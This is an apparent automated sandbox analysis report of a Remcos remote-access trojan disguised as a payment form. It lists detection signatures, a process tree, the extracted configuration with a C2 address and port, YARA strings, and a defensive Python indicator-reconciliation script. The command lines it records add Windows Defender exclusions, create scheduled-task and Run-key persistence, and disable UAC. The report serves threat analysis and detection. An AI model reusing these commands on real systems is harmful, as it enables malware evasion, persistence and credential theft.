Windows Analysis Report
Payment Transfer Request Form.bat.exe

Overview

General Information

Sample name: Payment Transfer Request Form.bat.exe
Analysis ID: 1561752
MD5: fc5a80adf45d78ffa834283d0a78f9f6
SHA1: 6865dec6f71546ea01420295b7175038c3a81ec4
SHA256: e588a098e9ceb33f2616e11a3faf28162e5f4b7f3800b22ab3023bc376aeb18c
Tags: bat, exe, user-abuse_ch

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Payment Transfer Request Form.bat.exe (PID: 4072 cmdline: "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe" MD5: FC5A80ADF45D78FFA834283D0A78F9F6)
    • powershell.exe (PID: 7144 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5360 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iKgKaogJ.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7192 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmp854C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Payment Transfer Request Form.bat.exe (PID: 7380 cmdline: "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe" MD5: FC5A80ADF45D78FFA834283D0A78F9F6)
      • wscript.exe (PID: 7480 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 7644 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\ProgramData\AppUpdate\remcos.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • remcos.exe (PID: 7704 cmdline: C:\ProgramData\AppUpdate\remcos.exe MD5: FC5A80ADF45D78FFA834283D0A78F9F6)
            • powershell.exe (PID: 7852 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\AppUpdate\remcos.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7872 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iKgKaogJ.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • conhost.exe (PID: 7892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • schtasks.exe (PID: 7920 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpAC9A.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
              • conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • remcos.exe (PID: 8156 cmdline: "C:\ProgramData\AppUpdate\remcos.exe" MD5: FC5A80ADF45D78FFA834283D0A78F9F6)
  • iKgKaogJ.exe (PID: 7508 cmdline: C:\Users\user\AppData\Roaming\iKgKaogJ.exe MD5: FC5A80ADF45D78FFA834283D0A78F9F6)
  • remcos.exe (PID: 916 cmdline: "C:\ProgramData\AppUpdate\remcos.exe" MD5: FC5A80ADF45D78FFA834283D0A78F9F6)
    • schtasks.exe (PID: 2052 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpCD42.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • remcos.exe (PID: 2508 cmdline: "C:\ProgramData\AppUpdate\remcos.exe" MD5: FC5A80ADF45D78FFA834283D0A78F9F6)
  • remcos.exe (PID: 2624 cmdline: "C:\ProgramData\AppUpdate\remcos.exe" MD5: FC5A80ADF45D78FFA834283D0A78F9F6)
    • schtasks.exe (PID: 7452 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpED6C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • remcos.exe (PID: 3248 cmdline: "C:\ProgramData\AppUpdate\remcos.exe" MD5: FC5A80ADF45D78FFA834283D0A78F9F6)
  • remcos.exe (PID: 3968 cmdline: "C:\ProgramData\AppUpdate\remcos.exe" MD5: FC5A80ADF45D78FFA834283D0A78F9F6)
    • schtasks.exe (PID: 7172 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmpCDB.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • remcos.exe (PID: 7388 cmdline: "C:\ProgramData\AppUpdate\remcos.exe" MD5: FC5A80ADF45D78FFA834283D0A78F9F6)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Extracted malware configuration (Remcos):
{"Host:Port:Password": ["149.226:9285:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "AppUpdate", "Hide file": "Disable", "Mutex": "Rmc-VCJ8ZS", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "AppUpdate", "Keylog folder": "remcos", "Keylog file max size": "100"}
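Most of the host artifacts recorded later in this report (the AppUpdate Run values, the HKCU\SOFTWARE\Rmc-VCJ8ZS key, the copy at C:\ProgramData\AppUpdate\remcos.exe) follow directly from fields in this configuration. The Python below is an editor's example, not Joe Sandbox or Remcos code: it derives the expected indicators from a subset of the extracted fields and reconciles them with what the analysis actually observed. Assumptions are labelled in the code: the install root C:\ProgramData is taken from the observed drop location rather than resolved from the "Install path" field; the HKLM Run value is placed under WOW6432Node because the sample is a 32-bit PE and the registry redirector sends a 32-bit process's writes to HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run there; and because the extractor's host field is truncated to "149.226", the C2 address from the Suricata alert is matched on a suffix and the truncation is flagged rather than silently accepted.

```python
"""Derive host and network indicators from an extracted Remcos configuration and
reconcile them with observed analysis artifacts. Editor's example; not Joe Sandbox code."""

# Subset of the configuration extracted in this report (field names exactly as the extractor emits them).
REMCOS_CONFIG = {
    "Host:Port:Password": ["149.226:9285:1"],  # host is truncated in the extractor output
    "Setup HKCU\\Run": "Enable",
    "Setup HKLM\\Run": "Enable",
    "Install path": "Application path",       # not resolved here; install root is taken from observation
    "Copy folder": "AppUpdate",
    "Copy file": "remcos.exe",
    "Startup value": "AppUpdate",
    "Mutex": "Rmc-VCJ8ZS",
}

# Artifacts recorded elsewhere in this report (process tree, registry events, Suricata alert).
OBSERVED_REGISTRY = {
    r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AppUpdate",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\AppUpdate",
    r"HKEY_CURRENT_USER\SOFTWARE\Rmc-VCJ8ZS\exepath",
}
OBSERVED_FILES = {r"C:\ProgramData\AppUpdate\remcos.exe"}
OBSERVED_C2 = {("212.162.149.226", 9285)}

RUN_SUBKEY = r"Microsoft\Windows\CurrentVersion\Run"


def expected_artifacts(cfg, install_root=r"C:\ProgramData", is_32bit=True):
    """Map configuration fields to the registry values, file path, mutex and C2
    endpoints a Remcos build with this configuration is expected to create.
    install_root is an assumption taken from the observed drop location."""
    mutex = cfg["Mutex"]
    registry = [
        # Remcos keeps its settings, including the encrypted install path, under HKCU\SOFTWARE\<mutex>.
        "\\".join([r"HKEY_CURRENT_USER\SOFTWARE", mutex, "exepath"]),
    ]
    if cfg.get("Setup HKCU\\Run") == "Enable":
        registry.append("\\".join([r"HKEY_CURRENT_USER\SOFTWARE", RUN_SUBKEY, cfg["Startup value"]]))
    if cfg.get("Setup HKLM\\Run") == "Enable":
        # A 32-bit process writing HKLM\SOFTWARE\...\Run is redirected to WOW6432Node on 64-bit Windows.
        hive = r"HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node" if is_32bit else r"HKEY_LOCAL_MACHINE\SOFTWARE"
        registry.append("\\".join([hive, RUN_SUBKEY, cfg["Startup value"]]))
    c2 = []
    for entry in cfg["Host:Port:Password"]:
        host, port, password = entry.rsplit(":", 2)
        c2.append({
            "host": host,
            "port": int(port),
            "password": password,
            # All-numeric host with fewer than three dots: a truncated extractor value, not a real IPv4 address.
            "truncated": host.replace(".", "").isdigit() and host.count(".") != 3,
        })
    return {
        "file": "\\".join([install_root, cfg["Copy folder"], cfg["Copy file"]]),
        "mutex": mutex,
        "registry": registry,
        "c2": c2,
    }


def reconcile(expected, observed_registry, observed_files, observed_c2):
    """Compare derived indicators with observed artifacts. A truncated C2 host is
    accepted only as a dotted suffix of an observed address on the same port."""
    c2_matched = []
    for ep in expected["c2"]:
        for host, port in sorted(observed_c2):
            exact = host == ep["host"]
            suffix = ep["truncated"] and host.endswith("." + ep["host"])
            if port == ep["port"] and (exact or suffix):
                c2_matched.append((host, port))
    return {
        "file_observed": expected["file"] in observed_files,
        "registry_missing": set(expected["registry"]) - set(observed_registry),
        "registry_unexplained": set(observed_registry) - set(expected["registry"]),
        "c2_matched": c2_matched,
    }


if __name__ == "__main__":
    art = expected_artifacts(REMCOS_CONFIG)
    print(reconcile(art, OBSERVED_REGISTRY, OBSERVED_FILES, OBSERVED_C2))
```

Everything in the registry_unexplained set would be an artifact the configuration does not account for, which is the list worth a closer look when the extractor output is incomplete.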
Source / Rule / Description / Author / Strings (memory dumps)

Source: 00000024.00000002.1736773927.0000000000BEA000.00000004.00000020.00020000.00000000.sdmp
  Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
Source: 00000020.00000002.1656887776.0000000000D4A000.00000004.00000020.00020000.00000000.sdmp
  Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
Source: 00000017.00000002.3782308386.00000000014FA000.00000004.00000020.00020000.00000000.sdmp
  Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
Source: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp
  Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
Source: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp
  Rule: Windows_Trojan_Remcos_b296e965; Description: unknown; Author: unknown
  Strings:
  • 0x691e0:$a1: Remcos restarted by watchdog!
  • 0x69738:$a3: %02i:%02i:%02i:%03i
  • 0x69abd:$a4: * Remcos v
(17 further entries not shown)

Source / Rule / Description / Author / Strings (unpacked PEs)

Source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.unpack
  Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
Source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.unpack
  Rule: Windows_Trojan_Remcos_b296e965; Description: unknown; Author: unknown
  Strings:
  • 0x679e0:$a1: Remcos restarted by watchdog!
  • 0x67f38:$a3: %02i:%02i:%02i:%03i
  • 0x682bd:$a4: * Remcos v
Source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.unpack
  Rule: REMCOS_RAT_variants; Description: unknown; Author: unknown
  Strings:
  • 0x629e4:$str_a1: C:\Windows\System32\cmd.exe
  • 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x61a0c:$str_b2: Executing file:
  • 0x62b28:$str_b3: GetDirectListeningPort
  • 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x62630:$str_b7: \update.vbs
  • 0x61a34:$str_b9: Downloaded file:
  • 0x61a20:$str_b10: Downloading file:
  • 0x61ac4:$str_b12: Failed to upload file:
  • 0x62af0:$str_b13: StartForward
  • 0x62b10:$str_b14: StopForward
  • 0x625d8:$str_b15: fso.DeleteFile "
  • 0x6256c:$str_b16: On Error Resume Next
  • 0x62608:$str_b17: fso.DeleteFolder "
  • 0x61ab4:$str_b18: Uploaded file:
  • 0x61a74:$str_b19: Unable to delete:
  • 0x625a0:$str_b20: while fso.FileExists("
  • 0x61f49:$str_c0: [Firefox StoredLogins not found]
Source: 9.2.Payment Transfer Request Form.bat.exe.400000.0.unpack
  Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer; Description: detects Windows executables potentially bypassing UAC using eventvwr.exe; Author: ditekSHen
  Strings:
  • 0x61900:$s1: \Classes\mscfile\shell\open\command
  • 0x61960:$s1: \Classes\mscfile\shell\open\command
  • 0x61948:$s2: eventvwr.exe
Source: 0.2.Payment Transfer Request Form.bat.exe.42d99c0.2.unpack
  Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security
(18 further entries not shown)

              System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", ParentImage: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe, ParentProcessId: 4072, ParentProcessName: Payment Transfer Request Form.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", ProcessId: 7144, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", ParentImage: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe, ParentProcessId: 7380, ParentProcessName: Payment Transfer Request Form.bat.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , ProcessId: 7480, ProcessName: wscript.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", ParentImage: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe, ParentProcessId: 7380, ParentProcessName: Payment Transfer Request Form.bat.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , ProcessId: 7480, ProcessName: wscript.exe
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", ParentImage: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe, ParentProcessId: 7380, ParentProcessName: Payment Transfer Request Form.bat.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , ProcessId: 7480, ProcessName: wscript.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: "C:\ProgramData\AppUpdate\remcos.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe, ProcessId: 7380, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AppUpdate
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", ParentImage: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe, ParentProcessId: 4072, ParentProcessName: Payment Transfer Request Form.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", ProcessId: 7144, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmp854C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmp854C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", ParentImage: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe, ParentProcessId: 4072, ParentProcessName: Payment Transfer Request Form.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmp854C.tmp", ProcessId: 7192, ProcessName: schtasks.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", ParentImage: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe, ParentProcessId: 7380, ParentProcessName: Payment Transfer Request Form.bat.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" , ProcessId: 7480, ProcessName: wscript.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: "C:\ProgramData\AppUpdate\remcos.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe, ProcessId: 7380, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\AppUpdate
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", ParentImage: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe, ParentProcessId: 4072, ParentProcessName: Payment Transfer Request Form.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", ProcessId: 7144, ProcessName: powershell.exe

              Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmp854C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmp854C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe", ParentImage: C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe, ParentProcessId: 4072, ParentProcessName: Payment Transfer Request Form.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iKgKaogJ" /XML "C:\Users\user\AppData\Local\Temp\tmp854C.tmp", ProcessId: 7192, ProcessName: schtasks.exe

              Stealing of Sensitive Information

Source: Registry Key set; Author: Joe Security; Data: Details: BA 5D 66 75 0B AD 2D 6B C4 A5 90 E2 E7 01 DB 6C E2 AD 4B C4 DA 85 FA E6 DF 3D B8 A1 D3 66 D7 01 66 64 17 29 82 B1 62 BF 59 84 B0 29 83 C0 6D D4 AA 1C 73 5E B7 20 AA 95 2F A4 C2 BC E5 60 82 E1 1A 1A 8D 40 E2 68 DB 3F , EventID: 13, EventType: SetValue, Image: C:\ProgramData\AppUpdate\remcos.exe, ProcessId: 8156, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-VCJ8ZS\exepath
